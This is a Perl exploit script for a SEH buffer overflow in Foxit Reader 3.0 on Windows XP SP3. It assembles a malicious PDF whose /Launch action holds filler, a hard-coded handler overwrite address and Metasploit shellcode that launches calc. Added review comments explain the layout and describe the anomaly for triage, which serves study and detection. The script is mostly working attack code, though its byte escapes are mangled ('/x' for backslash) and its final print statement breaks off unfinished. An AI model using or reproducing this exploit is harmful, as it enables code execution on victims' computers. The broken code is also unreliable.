#!/usr/bin/perl # # Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit # ------------------------------------------------------------ # Exploit by SkD ([email protected]) # # A SEH overflow occurs in this vulnerability in the popular # Foxit Reader. The latest build (1506) is not affected but # previous are. SafeSEH is a bitch in this one, but nothing # is impossible :). # # Exploit written for Windows XP SP3. # # Credits to CORE Sec. # # Note: Author is not responsible for any damage done with this. use strict; use warnings; my $pdf_data1 = "/x25/x50/x44/x46/x2D/x31/x2E/x34/x0D/x0A/x25/xA1/xB3/xC5/xD7/x0D/x0A/x31/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70". "/x65/x2F/x50/x61/x67/x65/x2F/x50/x61/x72/x65/x6E/x74/x20/x34/x20/x30/x20/x52/x20/x2F/x52/x65/x73/x6F/x75/x72/x63/x65/x73/x20/x36". "/x20/x30/x20/x52/x20/x2F/x4D/x65/x64/x69/x61/x42/x6F/x78/x5B/x20/x30/x20/x30/x20/x35/x39/x35/x20/x38/x34/x32/x5D/x2F/x47/x72/x6F". "/x75/x70/x3C/x3C/x2F/x53/x2F/x54/x72/x61/x6E/x73/x70/x61/x72/x65/x6E/x63/x79/x2F/x43/x53/x2F/x44/x65/x76/x69/x63/x65/x52/x47/x42". "/x2F/x49/x20/x74/x72/x75/x65/x3E/x3E/x2F/x43/x6F/x6E/x74/x65/x6E/x74/x73/x20/x32/x20/x30/x20/x52/x20/x2F/x41/x6E/x6E/x6F/x74/x73". "/x5B/x20/x39/x20/x30/x20/x52/x20/x20/x32/x34/x20/x30/x20/x52/x20/x20/x32/x35/x20/x30/x20/x52/x20/x5D/x3E/x3E/x0D/x0A/x65/x6E/x64". "/x6F/x62/x6A/x0D/x0A/x32/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4C/x65/x6E/x67/x74/x68/x20/x33/x20/x30/x20/x52/x20/x2F/x46". "/x69/x6C/x74/x65/x72/x2F/x46/x6C/x61/x74/x65/x44/x65/x63/x6F/x64/x65/x3E/x3E/x73/x74/x72/x65/x61/x6D/x0D/x0A/x78/x9C/x33/xD0/x33". "/x54/x28/xE7/x2A/x54/x30/x50/x30/x00/xB2/x4C/x2D/x4D/xF5/x8C/x15/x2C/x4C/x0C/xF5/x2C/x15/x8A/x52/x15/xC2/xB5/x14/xF2/xB8/x02/x15". "/x00/x87/xEB/x07/x8A/x0D/x0A/x65/x6E/x64/x73/x74/x72/x65/x61/x6D/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x33/x20/x30/x20/x6F/x62". 
"/x6A/x0D/x0A/x20/x34/x32/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x34/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65". "/x2F/x50/x61/x67/x65/x73/x2F/x52/x65/x73/x6F/x75/x72/x63/x65/x73/x20/x36/x20/x30/x20/x52/x20/x2F/x4D/x65/x64/x69/x61/x42/x6F/x78". "/x5B/x20/x30/x20/x30/x20/x35/x39/x35/x20/x38/x34/x32/x5D/x2F/x4B/x69/x64/x73/x5B/x20/x31/x20/x30/x20/x52/x20/x5D/x2F/x43/x6F/x75". "/x6E/x74/x20/x31/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x35/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x5A/x69/x54/x69". "/x20/x31/x38/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x36/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F". "/x46/x6F/x6E/x74/x20/x35/x20/x30/x20/x52/x20/x2F/x50/x72/x6F/x63/x53/x65/x74/x5B/x2F/x50/x44/x46/x2F/x54/x65/x78/x74/x5D/x3E/x3E". "/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x37/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x43/x61/x74/x61/x6C". "/x6F/x67/x2F/x50/x61/x67/x65/x73/x20/x34/x20/x30/x20/x52/x20/x2F/x4F/x70/x65/x6E/x41/x63/x74/x69/x6F/x6E/x5B/x20/x31/x20/x30/x20". "/x52/x20/x2F/x58/x59/x5A/x20/x6E/x75/x6C/x6C/x20/x6E/x75/x6C/x6C/x20/x30/x5D/x2F/x4C/x61/x6E/x67/x28/x65/x6E/x2D/x55/x53/x29/x3E". "/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x38/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x41/x75/x74/x68/x6F/x72/x28/xFE/xFF". "/x00/x6D/x00/x61/x00/x72/x00/x63/x00/x69/x00/x61/x00/x6E/x00/x6F/x29/x2F/x43/x72/x65/x61/x74/x6F/x72/x28/xFE/xFF/x00/x57/x00/x72". "/x00/x69/x00/x74/x00/x65/x00/x72/x29/x2F/x50/x72/x6F/x64/x75/x63/x65/x72/x28/xFE/xFF/x00/x4F/x00/x70/x00/x65/x00/x6E/x00/x4F/x00". "/x66/x00/x66/x00/x69/x00/x63/x00/x65/x00/x2E/x00/x6F/x00/x72/x00/x67/x00/x20/x00/x33/x00/x2E/x00/x30/x29/x2F/x43/x72/x65/x61/x74". "/x69/x6F/x6E/x44/x61/x74/x65/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34/x34/x35/x34/x39/x2D/x30/x32/x27/x30/x30/x27/x29". "/x2F/x4D/x6F/x64/x44/x61/x74/x65/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34/x34/x38/x31/x35/x2D/x30/x32/x27/x30/x30/x27". 
"/x29/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x35/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x46". "/x69/x6C/x65/x73/x70/x65/x63/x2F/x46/x28/x63/x75/x61/x6C/x71/x75/x69/x65/x72/x61/x29/x2F/x46/x53/x2F/x55/x52/x4C/x3E/x3E/x0D/x0A". "/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x34/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x53/x2F/x4D/x43/x44/x2F/x43/x54/x28/x61/x70". "/x70/x6C/x69/x63/x61/x74/x69/x6F/x6E/x2F/x66/x75/x74/x75/x72/x65/x73/x70/x6C/x61/x73/x68/x29/x2F/x50/x3C/x3C/x2F/x54/x46/x28/x54". "/x45/x4D/x50/x41/x43/x43/x45/x53/x53/x29/x3E/x3E/x2F/x44/x20/x31/x35/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A". "/x0D/x0A/x31/x33/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x53/x2F/x4D/x52/x2F/x43/x20/x31/x34/x20/x30/x20/x52/x20/x2F/x4E/x28". "/x63/x75/x61/x6C/x71/x75/x69/x65/x72/x61/x29/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x32/x20/x30/x20/x6F/x62/x6A/x0D". "/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x63/x74/x69/x6F/x6E/x2F/x53/x2F/x52/x65/x6E/x64/x69/x74/x69/x6F/x6E/x2F/x4F/x50/x20/x34". "/x2F/x41/x4E/x20/x39/x20/x30/x20/x52/x20/x2F/x52/x20/x31/x33/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A". "/x31/x31/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x45/x78/x74/x47/x53/x74/x61/x74/x65/x2F/x43/x41/x20/x31". "/x2F/x63/x61/x20/x31/x2F/x41/x49/x53/x20/x66/x61/x6C/x73/x65/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x30/x20/x30/x20". "/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4D/x61/x74/x72/x69/x78/x5B/x20/x31/x20/x30/x20/x30/x20/x31/x20/x30/x20/x30/x5D/x2F/x42/x42/x6F". "/x78/x5B/x20/x30/x20/x30/x20/x31/x33/x30/x2E/x31/x33/x39/x20/x32/x37/x2E/x32/x38/x39/x37/x5D/x2F/x52/x65/x73/x6F/x75/x72/x63/x65". "/x73/x3C/x3C/x2F/x45/x78/x74/x47/x53/x74/x61/x74/x65/x3C/x3C/x2F/x49/x6D/x61/x67/x65/x4F/x70/x61/x63/x69/x74/x79/x20/x31/x31/x20". "/x30/x20/x52/x20/x3E/x3E/x3E/x3E/x2F/x4C/x65/x6E/x67/x74/x68/x20/x35/x34/x2F/x46/x69/x6C/x74/x65/x72/x2F/x46/x6C/x61/x74/x65/x44". 
"/x65/x63/x6F/x64/x65/x3E/x3E/x73/x74/x72/x65/x61/x6D/x0D/x0A/x78/x9C/x2B/xE4/x2A/xE4/x32/x50/x00/xC1/xA2/x74/x30/xC3/xD0/xD8/x40". "/xCF/xD0/xD8/x52/xC1/xC8/x5C/xCF/xC8/xC2/xD2/x5C/xA1/x28/x95/xCB/x50/x01/x08/x8D/x2C/x20/xC2/xA6/x70/xE1/x34/x2D/xAE/x40/x20/x04". "/x00/xBD/x52/x0D/x43/x0D/x0A/x65/x6E/x64/x73/x74/x72/x65/x61/x6D/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x39/x20/x30/x20/x6F/x62". "/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x6E/x6E/x6F/x74/x2F/x53/x75/x62/x74/x79/x70/x65/x2F/x53/x63/x72/x65/x65/x6E/x2F". "/x50/x20/x31/x20/x30/x20/x52/x20/x2F/x4D/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34/x34/x37/x35/x36/x2D/x30/x32/x27/x30". "/x30/x27/x29/x2F/x46/x20/x34/x2F/x52/x65/x63/x74/x5B/x20/x32/x30/x35/x2E/x31/x35/x33/x20/x38/x30/x36/x2E/x31/x38/x32/x20/x33/x33". "/x35/x2E/x32/x39/x31/x20/x38/x33/x33/x2E/x34/x37/x32/x5D/x2F/x42/x53/x3C/x3C/x2F/x53/x2F/x53/x2F/x57/x20/x31/x3E/x3E/x2F/x42/x45". "/x3C/x3C/x2F/x53/x2F/x53/x3E/x3E/x2F/x4D/x4B/x3C/x3C/x2F/x42/x43/x5B/x20/x30/x20/x30/x20/x31/x5D/x2F/x52/x20/x30/x2F/x49/x46/x3C". "/x3C/x2F/x53/x57/x2F/x41/x2F/x53/x2F/x41/x2F/x46/x42/x20/x66/x61/x6C/x73/x65/x2F/x41/x5B/x20/x30/x2E/x35/x20/x30/x2E/x35/x5D/x3E". "/x3E/x3E/x3E/x2F/x41/x50/x3C/x3C/x2F/x4E/x20/x31/x30/x20/x30/x20/x52/x20/x3E/x3E/x2F/x54/x28/x63/x75/x61/x6C/x71/x75/x69/x65/x72". "/x61/x29/x2F/x41/x20/x31/x32/x20/x30/x20/x52/x20/x2F/x41/x41/x20/x31/x37/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62". "/x6A/x0D/x0A/x32/x35/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x6E/x6E/x6F/x74/x2F/x53/x75/x62/x74/x79". "/x70/x65/x2F/x50/x6F/x70/x75/x70/x2F/x50/x20/x31/x20/x30/x20/x52/x20/x2F/x4D/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34". "/x34/x38/x31/x35/x2D/x30/x32/x27/x30/x30/x27/x29/x2F/x46/x20/x32/x38/x2F/x52/x65/x63/x74/x5B/x20/x30/x20/x30/x20/x30/x20/x30/x5D". "/x2F/x4F/x70/x65/x6E/x20/x66/x61/x6C/x73/x65/x2F/x50/x61/x72/x65/x6E/x74/x20/x32/x34/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E". 
"/x64/x6F/x62/x6A/x0D/x0A/x32/x34/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x53/x75/x62/x74/x79/x70/x65/x2F/x46/x72/x65/x65/x54". "/x65/x78/x74/x2F/x52/x65/x63/x74/x5B/x20/x32/x38/x35/x20/x37/x39/x34/x20/x35/x34/x31/x20/x38/x32/x37/x5D/x2F/x46/x20/x34/x2F/x41". "/x50/x20/x31/x39/x20/x30/x20/x52/x20/x2F/x46/x6F/x78/x69/x74/x54/x61/x67/x20/x32/x33/x20/x30/x20/x52/x20/x2F/x50/x20/x31/x20/x30". "/x20/x52/x20/x2F/x50/x6F/x70/x75/x70/x20/x32/x35/x20/x30/x20/x52/x20/x2F/x46/x4E/x28/x48/x65/x6C/x76/x65/x74/x69/x63/x61/x29/x2F". "/x43/x6F/x6E/x74/x65/x6E/x74/x73/x28/x45/x64/x69/x74/x65/x64/x20/x62/x79/x20/x46/x6F/x78/x69/x74/x20/x52/x65/x61/x64/x65/x72/x5C". "/x72/x43/x6F/x70/x79/x72/x69/x67/x68/x74/x5C/x28/x43/x5C/x29/x20/x62/x79/x20/x46/x6F/x78/x69/x74/x20/x53/x6F/x66/x74/x77/x61/x72". "/x65/x20/x43/x6F/x6D/x70/x61/x6E/x79/x2C/x32/x30/x30/x35/x2D/x32/x30/x30/x38/x5C/x72/x46/x6F/x72/x20/x45/x76/x61/x6C/x75/x61/x74". "/x69/x6F/x6E/x20/x4F/x6E/x6C/x79/x2E/x5C/x72/x29/x2F/x42/x4B/x43/x20/x36/x35/x35/x33/x35/x2F/x51/x20/x30/x2F/x44/x41/x28/x2F/x5A". "/x69/x54/x69/x20/x31/x31/x20/x54/x66/x20/x31/x20/x30/x20/x30/x20/x72/x67/x20/x31/x20/x30/x20/x30/x20/x31/x20/x32/x38/x35/x20/x38". "/x31/x30/x2E/x35/x20/x54/x6D/x20/x30/x20/x54/x63/x20/x31/x30/x30/x20/x54/x7A/x29/x2F/x49/x54/x2F/x46/x72/x65/x65/x54/x65/x78/x74". "/x54/x79/x70/x65/x77/x72/x69/x74/x65/x72/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x33/x20/x30/x20/x6F/x62/x6A/x0D/x0A". "/x3C/x3C/x2F/x54/x65/x78/x74/x4D/x61/x74/x72/x69/x78/x5B/x20/x31/x20/x30/x20/x30/x20/x31/x20/x32/x38/x35/x20/x38/x31/x30/x2E/x35". "/x5D/x2F/x4C/x69/x63/x65/x6E/x73/x65/x28/x45/x76/x61/x6C/x75/x61/x74/x69/x6F/x6E/x29/x2F/x4D/x65/x6E/x64/x65/x72/x46/x6C/x61/x67". "/x28/x45/x76/x61/x6C/x75/x61/x74/x69/x6F/x6E/x2C/x41/x4E/x4E/x4F/x54/x29/x2F/x46/x6F/x6E/x74/x4E/x61/x6D/x65/x28/x48/x65/x6C/x76". "/x65/x74/x69/x63/x61/x29/x2F/x46/x6F/x6E/x74/x53/x69/x7A/x65/x20/x31/x31/x2F/x54/x65/x78/x74/x28/x45/x64/x69/x74/x65/x64/x20/x62". 
"/x79/x20/x46/x6F/x78/x69/x74/x20/x52/x65/x61/x64/x65/x72/x5C/x72/x43/x6F/x70/x79/x72/x69/x67/x68/x74/x5C/x28/x43/x5C/x29/x20/x62". "/x79/x20/x46/x6F/x78/x69/x74/x20/x53/x6F/x66/x74/x77/x61/x72/x65/x20/x43/x6F/x6D/x70/x61/x6E/x79/x2C/x32/x30/x30/x35/x2D/x32/x30". "/x30/x38/x5C/x72/x46/x6F/x72/x20/x45/x76/x61/x6C/x75/x61/x74/x69/x6F/x6E/x20/x4F/x6E/x6C/x79/x2E/x5C/x72/x29/x2F/x43/x68/x61/x72". "/x43/x6F/x6C/x6F/x72/x20/x32/x35/x35/x2F/x43/x68/x61/x72/x53/x70/x61/x63/x65/x20/x30/x2F/x4C/x69/x6E/x65/x46/x65/x65/x64/x20/x30". "/x2F/x48/x6F/x72/x7A/x53/x63/x61/x6C/x65/x20/x31/x30/x30/x2F/x4F/x72/x69/x67/x69/x6E/x58/x20/x32/x38/x35/x2F/x4F/x72/x69/x67/x69". "/x6E/x59/x20/x38/x31/x36/x2F/x62/x43/x68/x61/x6E/x67/x65/x42/x6F/x78/x20/x30/x2F/x42/x6F/x78/x57/x69/x64/x74/x68/x20/x32/x35/x36". "/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x32/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4D/x79/x46/x6F/x6E/x74/x20". "/x31/x38/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x31/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F". "/x46/x6F/x6E/x74/x20/x32/x32/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x30/x20/x30/x20/x6F/x62/x6A". "/x0D/x0A/x3C/x3C/x2F/x4C/x65/x6E/x67/x74/x68/x20/x31/x36/x38/x2F/x53/x75/x62/x74/x79/x70/x65/x2F/x46/x6F/x72/x6D/x2F/x42/x42/x6F". "/x78/x5B/x20/x32/x38/x35/x20/x37/x39/x34/x20/x35/x34/x31/x20/x38/x32/x37/x5D/x2F/x52/x65/x73/x6F/x75/x72/x63/x65/x73/x20/x32/x31". "/x20/x30/x20/x52/x20/x2F/x46/x69/x6C/x74/x65/x72/x2F/x46/x6C/x61/x74/x65/x44/x65/x63/x6F/x64/x65/x3E/x3E/x73/x74/x72/x65/x61/x6D". "/x0D/x0A/x78/x9C/x95/x8D/xCD/x0E/x82/x30/x10/x84/xEF/x7D/x8A/x3D/x42/xA2/xD8/x16/x88/x78/x15/xE1/x66/x4C/xB4/x2F/x50/x43/xC1/x1A". "/xE8/x92/xA6/xFE/xF4/xED/x25/x24/x28/x89/x27/xF6/x30/x99/x99/x6C/xBE/xD9/x0B/xB2/x39/xFA/x12/x8D/x03/xC6/x40/xD4/x84/x45/x74/x3C". "/xA0/x7F/xC6/x36/x84/xC1/x90/x81/x01/xCF/xD2/xA9/xDD/xEE/x92/xC9/x8A/x8E/x7C/x9F/x79/x12/xC5/x9C/x51/x3A/x40/x0F/x24/x28/x2A/xED". 
"/x54/x05/x57/x0F/x25/xBE/xB5/x83/xB3/x92/x95/xB2/x21/x88/xFB/x02/x24/x8B/xE7/xC8/x1C/x7B/x6F/x75/x73/x73/x41/x1E/xFE/xC0/x17/xAC". "/xDD/x4B/x5A/x05/x39/x76/xBD/x34/x7E/xC5/x29/x4D/xD7/x83/x64/x0B/xC7/xF8/x7C/xAB/x44/x0B/xC5/x53/xB6/x0F/xE9/x34/x1A/x38/x99/xD6". "/x47/x23/xAF/x10/xE4/x03/x4A/x14/x4C/x32/x0D/x0A/x65/x6E/x64/x73/x74/x72/x65/x61/x6D/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31". "/x39/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4E/x20/x32/x30/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D". "/x0A/x31/x38/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x46/x6F/x6E/x74/x2F/x53/x75/x62/x74/x79/x70/x65/x2F". "/x54/x79/x70/x65/x31/x2F/x42/x61/x73/x65/x46/x6F/x6E/x74/x2F/x48/x65/x6C/x76/x65/x74/x69/x63/x61/x2F/x45/x6E/x63/x6F/x64/x69/x6E". "/x67/x2F/x57/x69/x6E/x41/x6E/x73/x69/x45/x6E/x63/x6F/x64/x69/x6E/x67/x2F/x46/x78/x54/x61/x67/x20/x31/x3E/x3E/x0D/x0A/x65/x6E/x64". "/x6F/x62/x6A/x0D/x0A/x31/x37/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x50/x56/x20/x31/x36/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A". "/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x36/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x63/x74/x69/x6F/x6E". "/x2F/x53/x2F/x4C/x61/x75/x6E/x63/x68/x2F/x46/x3C/x3C/x2F/x46/x28/x2F/x43/x2F"; my $pdf_data2 = "/x29/x3E/x3E/x2F/x4E/x65/x77/x57/x69/x6E/x64/x6F/x77/x20/x74/x72/x75/x65/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x78/x72". "/x65/x66/x0D/x0A/x30/x20/x32/x36/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x30/x30/x30/x20/x36/x35/x35/x33/x36/x20/x66/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x30/x30/x31/x37/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x31/x39/x37/x20/x30/x30/x30". "/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x33/x31/x34/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30". "/x30/x33/x33/x36/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x34/x33/x32/x20/x30/x30/x30/x30/x30/x20/x6E". 
"/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x34/x36/x38/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x35/x32/x32". "/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x36/x31/x39/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x31/x33/x37/x30/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x31/x31/x34/x37/x20/x30/x30/x30". "/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x31/x30/x38/x38/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30". "/x31/x30/x31/x35/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x39/x36/x32/x20/x30/x30/x30/x30/x30/x20/x6E". "/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x38/x37/x32/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x38/x31/x33". "/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x39/x38/x34/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x32/x39/x34/x39/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x38/x34/x39/x20/x30/x30/x30". "/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x38/x31/x35/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30". "/x32/x35/x32/x30/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x34/x38/x33/x20/x30/x30/x30/x30/x30/x20/x6E". "/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x34/x34/x34/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x31/x30/x32". "/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x31/x37/x36/x36/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x31/x36/x33/x35/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x74/x72/x61/x69/x6C/x65/x72/x0D/x0A/x3C/x3C/x2F/x52/x6F". "/x6F/x74/x20/x37/x20/x30/x20/x52/x20/x2F/x49/x6E/x66/x6F/x20/x38/x20/x30/x20/x52/x20/x2F/x49/x44/x5B/x28/xDF/xB0/x2B/xEC/xF3/x6B". "/xFA/x01/x9C/xBC/x4B/x06/x11/x7C/x78/x79/x29/x28/xDF/xB0/x2B/xEC/xF3/x6B/xFA/x01/x9C/xBC/x4B/x06/x11/x7C/x78/x79/x29/x5D/x2F/x44". 
"/x6F/x63/x43/x68/x65/x63/x6B/x73/x75/x6D/x2F/x37/x36/x33/x36/x30/x32/x39/x46/x42/x32/x42/x32/x46/x44/x32/x39/x42/x43/x33/x34/x41". "/x42/x43/x33/x32/x43/x46/x34/x35/x42/x38/x46/x2F/x53/x69/x7A/x65/x20/x32/x36/x3E/x3E/x0D/x0A/x73/x74/x61/x72/x74/x78/x72/x65/x66". "/x0D/x0A/x38/x30/x35/x37/x0D/x0A/x25/x25/x45/x4F/x46/x0D/x0A"; # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49". "/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36". "/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34". "/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41". "/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4a/x4e/x46/x34". "/x42/x50/x42/x30/x42/x50/x4b/x58/x45/x44/x4e/x43/x4b/x58/x4e/x37". "/x45/x30/x4a/x37/x41/x30/x4f/x4e/x4b/x38/x4f/x44/x4a/x41/x4b/x58". "/x4f/x55/x42/x32/x41/x30/x4b/x4e/x49/x44/x4b/x38/x46/x53/x4b/x58". "/x41/x30/x50/x4e/x41/x43/x42/x4c/x49/x39/x4e/x4a/x46/x48/x42/x4c". "/x46/x37/x47/x50/x41/x4c/x4c/x4c/x4d/x30/x41/x50/x44/x4c/x4b/x4e". "/x46/x4f/x4b/x53/x46/x55/x46/x32/x46/x50/x45/x37/x45/x4e/x4b/x48". "/x4f/x35/x46/x32/x41/x30/x4b/x4e/x48/x36/x4b/x58/x4e/x30/x4b/x54". "/x4b/x48/x4f/x55/x4e/x41/x41/x50/x4b/x4e/x4b/x48/x4e/x31/x4b/x38". "/x41/x30/x4b/x4e/x49/x58/x4e/x45/x46/x32/x46/x50/x43/x4c/x41/x33". "/x42/x4c/x46/x46/x4b/x58/x42/x44/x42/x33/x45/x38/x42/x4c/x4a/x47". "/x4e/x30/x4b/x48/x42/x34/x4e/x50/x4b/x48/x42/x37/x4e/x51/x4d/x4a". "/x4b/x48/x4a/x36/x4a/x30/x4b/x4e/x49/x50/x4b/x58/x42/x48/x42/x4b". "/x42/x30/x42/x30/x42/x30/x4b/x38/x4a/x56/x4e/x43/x4f/x35/x41/x43". "/x48/x4f/x42/x36/x48/x45/x49/x58/x4a/x4f/x43/x48/x42/x4c/x4b/x37". "/x42/x55/x4a/x36/x50/x37/x4a/x4d/x44/x4e/x43/x47/x4a/x36/x4a/x59". "/x50/x4f/x4c/x38/x50/x30/x47/x35/x4f/x4f/x47/x4e/x43/x46/x41/x36". 
"/x4e/x56/x43/x36/x42/x50/x5a";   # final fragment of the $shellcode literal that starts on the previous line

# --- Layout of the oversized string ------------------------------------
# The pieces below are concatenated between $pdf_data1 and $pdf_data2.
# The hex values at the end of $pdf_data1 spell "/S/Launch/F<</F(/C/" and
# those at the start of $pdf_data2 spell ")>>/NewWindow true>>", so the
# whole run lands inside the parenthesised file name of a /Launch action.
# NOTE(review): for triage, a /Launch action whose /F string is thousands
# of characters long is the anomaly this file exhibits.

# Leading filler: the "/x41" unit repeated 1346 times, placed before the
# two handler-record fields.
my $overflow1 = "/x41" x 1346;

# Middle filler: repetition count is 4096 minus the length of $shellcode
# and minus 255 (the size used for the trailing filler below).
my $overflow2 = "/x41" x (4096 - (length($shellcode) + 255));

# Trailing filler: 255 repetitions, emitted after $shellcode.
my $overflow3 = "/x41" x 255;

# Three-character string written immediately before $sehret.
# NOTE(review): the variable name suggests this occupies the slot ahead of
# the handler pointer; the value is the author's handle, not an instruction.
my $sehjmp = "SkD"; # ;)

# Hard-coded four-value address, listed low byte first.
# NOTE(review): a fixed address ties this to one memory layout; the file
# header says it was written for Windows XP SP3 and that build 1506 of the
# reader is not affected, so updating the reader is the stated remedy.
my $sehret = "/x64/xee/x1f/x02"; # 0x021fee64 - damn you SafeSEH

# Write the assembled document to s.pdf in the current directory.
# NOTE(review): two-argument open with the mode inside the string, and the
# return value is not checked, so a failed open is not reported here.
open (my $pdf, "> s.pdf");

# Raw mode so no newline translation is applied on output.
binmode $pdf;

# Output order: PDF prefix, leading filler, the two handler-record fields,
# middle filler, $shellcode, trailing filler, PDF suffix (xref and trailer).
print $pdf $pdf_data1.
$overflow1.$sehjmp.$sehret.$overflow2.$shellcode.$overflow3.
